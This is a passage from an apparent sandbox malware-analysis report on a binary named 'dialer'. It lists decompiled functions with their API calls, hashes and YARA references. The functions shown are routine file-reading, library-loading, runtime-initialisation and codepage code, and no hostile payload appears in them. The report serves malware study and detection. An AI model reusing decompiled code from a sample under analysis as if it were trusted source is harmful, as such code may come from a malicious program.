						if( *0x46a9d4 == 0x31) {
							E00407352(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00408744(_t24);
						}
					}
				}
				return _t9;
			}

0x00408bc2
0x00408bc2
0x00408bc7
0x00408bd0
0x00408bd2
0x00408bda
0x00408bdd
0x00408bf8
0x00408bfe
0x00408c03
0x00408c43
0x00408c05
0x00408c07
0x00408c0d
0x00408c13
0x00408c1f
0x00408c26
0x00408c2a
0x00408c2a
0x00408c34
0x00408c34
0x00408c3b
0x00408c3b
0x00408c46
0x00408c4f
0x00408c51
0x00408c58
0x00408c63
0x00000000
0x00408c6a
0x00408c58
0x00408c4f
0x00408c72

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C99), ref: 00408BF8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C99), ref: 00408C07
Sleep.KERNEL32(00002710,?,?,?,00408C99), ref: 00408C34
CloseHandle.KERNEL32(00000000,?,?,?,00408C99), ref: 00408C3B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: 4f3fd621e4f3f5f36b4a7f952db6336f0a7110819dd6bf3456e3042890efa563
Instruction ID: 64518da017182490db2074a6ffe8a4fd916785e5af71763068ad1115082ad158
Opcode Fuzzy Hash: 4f3fd621e4f3f5f36b4a7f952db6336f0a7110819dd6bf3456e3042890efa563
Instruction Fuzzy Hash: 02112E702067506EF6316B24AED962F7A65A741345F04483FF5C1632D2DF789D91833E

Uniqueness

Uniqueness Score: -1.00%

Function 00417334, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417334(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00402439(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x00417337
0x00417338
0x0041733b
0x0041733d
0x00417357
0x0041735c
0x0041736e
0x00417372
0x00417380
0x00417393
0x00417395
0x00417395
0x00417398
0x0041739e
0x0041735e
0x0041735e
0x0041735e
0x004173a5

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417365
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 0041738A
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00404210,0045F454), ref: 00417398

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
Opcode Fuzzy Hash: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634

Uniqueness

Uniqueness Score: -1.00%

Function 00440CE2, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00440CE2(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46b658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x458b68 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x3dad585f
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00440ce7
0x00440ceb
0x00440cf2
0x00440cf6
0x00440d04
0x00440d1a
0x00440d1e
0x00440d47
0x00440d49
0x00440d4d
0x00440d50
0x00440d50
0x00440d56
0x00440d58
0x00000000
0x00440d59
0x00440d20
0x00440d29
0x00440d38
0x00440d2b
0x00440d2e
0x00440d34
0x00440d34
0x00440d3c
0x00000000
0x00440d3e
0x00440d41
0x00440d43
0x00000000
0x00440d43
0x00440d3c
0x00440cf8
0x00440cfd
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00440C89,?,00000000,00000000,00000000,?,00440FB5,00000006,FlsSetValue), ref: 00440D14
GetLastError.KERNEL32(?,00440C89,?,00000000,00000000,00000000,?,00440FB5,00000006,FlsSetValue,00459058,00459060,00000000,00000364,?,00440A44), ref: 00440D20
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00440C89,?,00000000,00000000,00000000,?,00440FB5,00000006,FlsSetValue,00459058,00459060,00000000), ref: 00440D2E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 0e5a104054700754a18f7814cd9c13a4df51075ca96ee02485d652ff580a1420
Instruction ID: 76798d8747718092efa2910e7e16e4bf13147850b8fcca4f869f853950d4d495
Opcode Fuzzy Hash: 0e5a104054700754a18f7814cd9c13a4df51075ca96ee02485d652ff580a1420
Instruction Fuzzy Hash: 75014C72A013229BD7214EB99C449573B98AF017E27100632FF09D7240CB39ED15C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00431611, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431611() {
				void* _t4;
				void* _t8;

				E00434851();
				E004315A5();
				if(E00434AA5() != 0) {
					_t4 = E00434A57(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00434AE1();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00431611
0x00431616
0x00431622
0x00431627
0x0043162c
0x0043162e
0x00431639
0x00431630
0x00431630
0x00000000
0x00431630
0x00431624
0x00431624
0x00431626
0x00431626

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431611
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431616
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043161B

Part of subcall function 00434AA5: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00434AB6

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431630

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction ID: 5bd34e3a9dce145a3b421456380c81e9cc1b8235ab00a0158aa2437511a3e12d
Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction Fuzzy Hash: 59C04C58484180162C543AF222035EE13602CFF39DF9534CFA8A117523890E640B683F

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC7D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043ED0D

Strings

pow, xrefs: 0043ECE5, 0043ED02

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4024ad2970b35efbe5480a19e41fc6c0bcf49fc2ba007b8df4769c5465c00789
Instruction ID: 176a512b0b6b6af6dda5a672903696f03aee5c9b9a6fdbae947a39d89fa4a7fc
Opcode Fuzzy Hash: 4024ad2970b35efbe5480a19e41fc6c0bcf49fc2ba007b8df4769c5465c00789
Instruction Fuzzy Hash: 20517C61A0A60296EB117716CD023AF2B94DB44705F305D6BE496423EAEF3DCC919ACF

Uniqueness

Uniqueness Score: -1.00%

Function 00424BC0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00424BC0(char __ecx, intOrPtr __edx) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				char _t58;
				void* _t63;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t68;
				void* _t69;
				intOrPtr* _t70;
				void* _t74;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t83;
				char _t84;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t96;
				intOrPtr _t101;
				intOrPtr _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				void* _t110;

				_t58 = __ecx;
				_v28 = __ecx;
				_t105 = __edx;
				_v20 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L8:
					return 0;
				} else {
					_t108 =  *((intOrPtr*)(__ecx + 0x20));
					if(_t108 == 0) {
						L21:
						_t109 =  *((intOrPtr*)(_t58 + 0x1c));
						if(_t109 == 0) {
							L48:
							return 1;
						}
						_t84 = 0;
						_v16 = 0;
						_v24 = 0;
						_v28 = 0;
						_v8 = 0;
						_v12 = 0;
						do {
							_t63 = ( *(_t109 + 0xc) & 0x000000ff) - 1;
							if(_t63 == 0) {
								_t64 =  *((intOrPtr*)(_t105 + 0x28));
								_v32 = _t64;
								if(_t64 == 0) {
									L38:
									L39:
									_t65 = _v16;
									L40:
									_t89 = _v12;
									goto L41;
								}
								_v24 = 1;
								_t107 = _t64;
								do {
									_push( *((intOrPtr*)(_t109 + 8)));
									_push( *((intOrPtr*)(_t109 + 4)));
									_push( *((intOrPtr*)(_t107 + 8)));
									_t90 = 2;
									_t68 = E00424ADA(_t90,  *((intOrPtr*)(_t107 + 0xc)));
									_t107 =  *_t107;
									_t110 = _t110 + 0xc;
									_v28 = _t68;
								} while (_t107 != 0);
								_t105 = _v20;
								goto L38;
							}
							_t69 = _t63 - 1;
							if(_t69 == 0) {
								_t70 =  *((intOrPtr*)(_t105 + 0x24));
								_v32 = _t70;
								if(_t70 == 0) {
									goto L38;
								}
								_t106 = _t70;
								_t84 = 1;
								do {
									_push( *((intOrPtr*)(_t109 + 8)));
									_push( *((intOrPtr*)(_t109 + 4)));
									_push( *((intOrPtr*)(_t106 + 8)));
									_t91 = 2;
									_t65 = E00424ADA(_t91,  *((intOrPtr*)(_t106 + 0xc)));
									_t106 =  *_t106;
									_t110 = _t110 + 0xc;
									_v16 = _t65;
								} while (_t106 != 0);
								_t105 = _v20;
								_t43 =  &_v8; // 0x425e6c
								_t101 =  *_t43;
								goto L40;
							}
							if(_t69 != 0) {
								goto L38;
							}
							_t73 =  *((intOrPtr*)(_t105 + 0x334));
							_t101 = 1;
							_v8 = 1;
							if( *((intOrPtr*)(_t105 + 0x334)) == 0) {
								goto L39;
							}
							_t92 =  *((intOrPtr*)(_t109 + 8));
							if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t109 + 8))) {
								goto L39;
							}
							_t74 = E004330D1(_t73,  *((intOrPtr*)(_t109 + 4)), _t92);
							_t32 =  &_v8; // 0x425e6c
							_t101 =  *_t32;
							_t110 = _t110 + 0xc;
							_t65 = _v16;
							if(_t74 != 0) {
								goto L40;
							}
							_t89 = 1;
							_v12 = 1;
							L41:
							_t109 =  *_t109;
						} while (_t109 != 0);
						if(_t84 == 0 || _t65 != 0) {
							if(_v24 == 0 || _v28 != 0) {
								if(_t101 == 0 || _t89 != 0) {
									goto L48;
								} else {
									goto L8;
								}
							} else {
								goto L8;
							}
						} else {
							goto L8;
						}
					} else {
						goto L3;
					}
					do {
						L3:
						_t76 = ( *(_t108 + 0xc) & 0x000000ff) - 1;
						if(_t76 == 0) {
							_t86 =  *((intOrPtr*)(_t105 + 0x28));
							while(_t86 != 0) {
								_t77 = E00424ADA(1,  *((intOrPtr*)(_t86 + 0xc)),  *((intOrPtr*)(_t86 + 8)),  *((intOrPtr*)(_t108 + 4)),  *((intOrPtr*)(_t108 + 8)));
								_t110 = _t110 + 0xc;
								if(_t77 != 0) {
									goto L8;
								}
								_t86 =  *_t86;
							}
							goto L19;
						}
						_t78 = _t76 - 1;
						if(_t78 == 0) {
							_t87 =  *((intOrPtr*)(_t105 + 0x24));
							while(_t87 != 0) {
								_push( *((intOrPtr*)(_t108 + 8)));
								_push( *((intOrPtr*)(_t108 + 4)));
								_push( *((intOrPtr*)(_t87 + 8)));
								_t96 = 2;
								_t79 = E00424ADA(_t96,  *((intOrPtr*)(_t87 + 0xc)));
								_t110 = _t110 + 0xc;
								if(_t79 != 0) {
									goto L8;
								}
								_t87 =  *_t87;
							}
							goto L19;
						}
						if(_t78 != 0) {
							goto L19;
						}
						_t82 =  *((intOrPtr*)(_t108 + 8));
						if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t108 + 8))) {
							goto L19;
						}
						_t83 = E004330D1( *((intOrPtr*)(_t105 + 0x334)),  *((intOrPtr*)(_t108 + 4)), _t82);
						_t110 = _t110 + 0xc;
						if(_t83 != 0) {
							goto L19;
						}
						goto L8;
						L19:
						_t108 =  *_t108;
					} while (_t108 != 0);
					_t58 = _v28;
					goto L21;
				}
			}

0x00424bc8
0x00424bca
0x00424bce
0x00424bd0
0x00424bd5
0x00424c1b
0x00000000
0x00424bdb
0x00424bdb
0x00424be0
0x00424c7f
0x00424c7f
0x00424c84
0x00424da3
0x00000000
0x00424da5
0x00424c8a
0x00424c8c
0x00424c8f
0x00424c92
0x00424c95
0x00424c98
0x00424c9b
0x00424c9f
0x00424ca2
0x00424d30
0x00424d33
0x00424d38
0x00424d66
0x00424d69
0x00424d69
0x00424d6c
0x00424d6c
0x00000000
0x00424d6c
0x00424d3a
0x00424d41
0x00424d43
0x00424d43
0x00424d49
0x00424d4c
0x00424d51
0x00424d52
0x00424d57
0x00424d59
0x00424d5c
0x00424d5f
0x00424d63
0x00000000
0x00424d63
0x00424ca8
0x00424cab
0x00424cf9
0x00424cfc
0x00424d01
0x00000000
0x00000000
0x00424d05
0x00424d07
0x00424d08
0x00424d08
0x00424d0e
0x00424d11
0x00424d16
0x00424d17
0x00424d1c
0x00424d1e
0x00424d21
0x00424d24
0x00424d28
0x00424d2b
0x00424d2b
0x00000000
0x00424d2b
0x00424cb1
0x00000000
0x00000000
0x00424cb7
0x00424cbf
0x00424cc0
0x00424cc5
0x00000000
0x00000000
0x00424ccb
0x00424cd4
0x00000000
0x00000000
0x00424cdf
0x00424ce4
0x00424ce4
0x00424ce7
0x00424cec
0x00424cef
0x00000000
0x00000000
0x00424cf3
0x00424cf4
0x00424d6f
0x00424d6f
0x00424d71
0x00424d7b
0x00424d8a
0x00424d99
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424be6
0x00424be6
0x00424bea
0x00424bed
0x00424c4c
0x00424c6e
0x00424c60
0x00424c65
0x00424c6a
0x00000000
0x00000000
0x00424c6c
0x00424c6c
0x00000000
0x00424c6e
0x00424bef
0x00424bf2
0x00424c24
0x00424c46
0x00424c29
0x00424c2f
0x00424c32
0x00424c37
0x00424c38
0x00424c3d
0x00424c42
0x00000000
0x00000000
0x00424c44
0x00424c44
0x00000000
0x00424c4a
0x00424bf8
0x00000000
0x00000000
0x00424bfa
0x00424c03
0x00000000
0x00000000
0x00424c0f
0x00424c14
0x00424c19
0x00000000
0x00000000
0x00000000
0x00424c72
0x00424c72
0x00424c74
0x00424c7c
0x00000000
0x00424c7c

APIs

_memcmp.LIBVCRUNTIME ref: 00424C0F
_memcmp.LIBVCRUNTIME ref: 00424CDF

Strings

l^B, xrefs: 00424D66, 00424D2B, 00424CE4

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _memcmp
String ID: l^B
API String ID: 2931989736-40287024
Opcode ID: a43e7a2034180defaa42edab59dee4d2d57d45107e336d1da988573b438aee58
Instruction ID: a7a5db5a57825d5e6501a91f0819f95ff699f44237cc3adf86ea4277f17eba99
Opcode Fuzzy Hash: a43e7a2034180defaa42edab59dee4d2d57d45107e336d1da988573b438aee58
Instruction Fuzzy Hash: 5F51E035B006229BCB25CF6AE580A2BF7B5FFC4710B95812AD91997304E735ED11CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00444C43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00444C43(signed int _a4, signed short* _a8, char _a12) {
				void _v8;
				signed int _v12;
				signed int _v16;
				signed short* _v20;
				void* _v24;
				long _v28;
				intOrPtr _t73;
				signed short* _t74;
				signed short* _t76;
				signed char _t77;
				signed short _t83;
				signed short _t85;
				void* _t87;
				signed short _t88;
				void* _t92;
				signed short* _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t100;
				signed short _t101;
				signed short* _t104;
				void* _t105;
				char _t106;
				char _t107;
				void* _t108;
				signed short _t109;
				signed int _t110;
				signed int _t111;
				signed short* _t112;
				void* _t115;

				_t3 =  &_a12; // 0x445441
				_t111 =  *_t3;
				_t95 = _a4 >> 6;
				_t110 = (_a4 & 0x0000003f) * 0x30;
				_v12 = _t95;
				_t73 =  *((intOrPtr*)(0x46b800 + _t95 * 4));
				_t92 = 0xa;
				_v24 =  *((intOrPtr*)(_t73 + _t110 + 0x18));
				_t104 = _a8;
				if(_t111 == 0 ||  *_t104 != _t92) {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) & 0x000000fb;
				} else {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) | 0x00000004;
				}
				_t74 =  &(_t104[_t111]);
				_t93 = _t104;
				_v20 = _t74;
				_t112 = _t104;
				if(_t104 >= _t74) {
					L31:
					return _t112 - _t104 & 0xfffffffe;
				} else {
					_t76 =  &(_t104[1]);
					while(1) {
						_t96 =  *_t93 & 0x0000ffff;
						_v16 = _t96;
						_t97 = _v12;
						if(_t96 == 0x1a) {
							break;
						}
						_t105 = 0xd;
						_t104 = _a8;
						if(_v16 == _t105) {
							_t28 =  &_v20; // 0x445441
							if(_t76 >=  *_t28) {
								_t93 =  &(_t93[1]);
								_v16 =  &(_t76[1]);
								if(ReadFile(_v24,  &_v8, 2,  &_v28, 0) == 0 || _v28 == 0) {
									L23:
									_t83 = 0xd;
									 *_t112 = _t83;
									_t112 =  &(_t112[1]);
								} else {
									_t100 = _v12;
									_t85 = 0xa;
									if(( *( *((intOrPtr*)(0x46b800 + _t100 * 4)) + _t110 + 0x28) & 0x00000048) == 0) {
										if(_v8 != _t85) {
											L22:
											E0044471C(_a4, 0xfffffffe, 0xffffffff, 1);
											_t115 = _t115 + 0x10;
											_t87 = 0xa;
											if(_v8 == _t87) {
												L24:
												_t76 = _v16;
												L25:
												_t104 = _a8;
												L26:
												_t62 =  &_v20; // 0x445441
												if(_t93 <  *_t62) {
													continue;
												}
												goto L31;
											}
											goto L23;
										}
										_t104 = _a8;
										if(_t112 != _t104) {
											goto L22;
										}
										 *_t112 = _t85;
										_t112 =  &(_t112[1]);
										_t76 = _v16;
										goto L26;
									}
									_t106 = _v8;
									if(_t106 != _t85) {
										_t88 = 0xd;
										 *_t112 = _t88;
										 *((char*)( *((intOrPtr*)(0x46b800 + _t100 * 4)) + _t110 + 0x2a)) = _t106;
										 *((char*)( *((intOrPtr*)(0x46b800 + _t100 * 4)) + _t110 + 0x2b)) = _t106;
										_t107 = 0xa;
										 *((char*)( *((intOrPtr*)(0x46b800 + _t100 * 4)) + _t110 + 0x2c)) = _t107;
									} else {
										 *_t112 = _t85;
									}
								}
								goto L24;
							}
							_t108 = 0xa;
							_t104 = _a8;
							if( *_t76 != _t108) {
								_t109 = 0xd;
								 *_t112 = _t109;
								_t93 =  &(_t93[1]);
								_t112 =  &(_t112[1]);
								_t76 =  &(_t76[1]);
								goto L25;
							}
							_t101 = 0xa;
							_t93 =  &(_t93[2]);
							 *_t112 = _t101;
							_t76 =  &(_t76[2]);
							_t112 =  &(_t112[1]);
							goto L26;
						}
						_t93 =  &(_t93[1]);
						 *_t112 = _v16;
						_t112 =  &(_t112[1]);
						_t76 =  &(_t76[1]);
						goto L26;
					}
					_t98 =  *((intOrPtr*)(0x46b800 + _t97 * 4));
					_t77 =  *(_t98 + _t110 + 0x28);
					if((_t77 & 0x00000040) != 0) {
						 *_t112 =  *_t93;
						_t112 =  &(_t112[1]);
					} else {
						 *(_t98 + _t110 + 0x28) = _t77 | 0x00000002;
					}
					goto L31;
				}
			}

0x00444c56
0x00444c56
0x00444c5a
0x00444c5d
0x00444c60
0x00444c65
0x00444c6c
0x00444c71
0x00444c74
0x00444c79
0x00444c87
0x00444c80
0x00444c80
0x00444c80
0x00444c8c
0x00444c8f
0x00444c91
0x00444c94
0x00444c98
0x00444df5
0x00444e02
0x00444c9e
0x00444c9e
0x00444ca1
0x00444ca1
0x00444ca4
0x00444caa
0x00444cad
0x00000000
0x00000000
0x00444cb5
0x00444cba
0x00444cbd
0x00444cd3
0x00444cd6
0x00444d0e
0x00444d13
0x00444d2b
0x00444dbb
0x00444dbd
0x00444dbe
0x00444dc1
0x00444d3b
0x00444d3b
0x00444d4c
0x00444d4d
0x00444d8d
0x00444da1
0x00444daa
0x00444daf
0x00444db4
0x00444db9
0x00444dc4
0x00444dc4
0x00444dc7
0x00444dc7
0x00444dca
0x00444dca
0x00444dcd
0x00000000
0x00000000
0x00000000
0x00444dd3
0x00000000
0x00444db9
0x00444d8f
0x00444d94
0x00000000
0x00000000
0x00444d96
0x00444d99
0x00444d9c
0x00000000
0x00444d9c
0x00444d4f
0x00444d56
0x00444d5f
0x00444d60
0x00444d6c
0x00444d77
0x00444d82
0x00444d83
0x00444d58
0x00444d58
0x00444d58
0x00444d56
0x00000000
0x00444d2b
0x00444cda
0x00444cde
0x00444ce1
0x00444cf9
0x00444cfa
0x00444cfd
0x00444d00
0x00444d03
0x00000000
0x00444d03
0x00444ce5
0x00444ce6
0x00444ce9
0x00444cec
0x00444cef
0x00000000
0x00444cef
0x00444cc2
0x00444cc5
0x00444cc8
0x00444ccb
0x00000000
0x00444ccb
0x00444dd5
0x00444ddc
0x00444de2
0x00444def
0x00444df2
0x00444de4
0x00444de6
0x00444de6
0x00000000
0x00444de2

Strings

ATD, xrefs: 00444C56
ATD, xrefs: 00444CD3, 00444DCA

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID: ATD$ATD
API String ID: 0-3021133724
Opcode ID: a65dd9f6eadd33c08848411c673892fbaecbd49b166bce7246082f7b8333cef9
Instruction ID: 6ed0aa2934ad5fae4746727e86f527d53624c249408ba3bf36f5147f861b95b3
Opcode Fuzzy Hash: a65dd9f6eadd33c08848411c673892fbaecbd49b166bce7246082f7b8333cef9
Instruction Fuzzy Hash: B8512871E04209EBEB20DF54C882BAA7770FF95320F25826BD4549B3D0E3789A81C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00445BF4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00445BF4(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x46a00c; // 0x3dad585e
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x446126
				_t101 =  *_t2;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					L00447F5C(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					E0044348A(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
					E0044348A(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
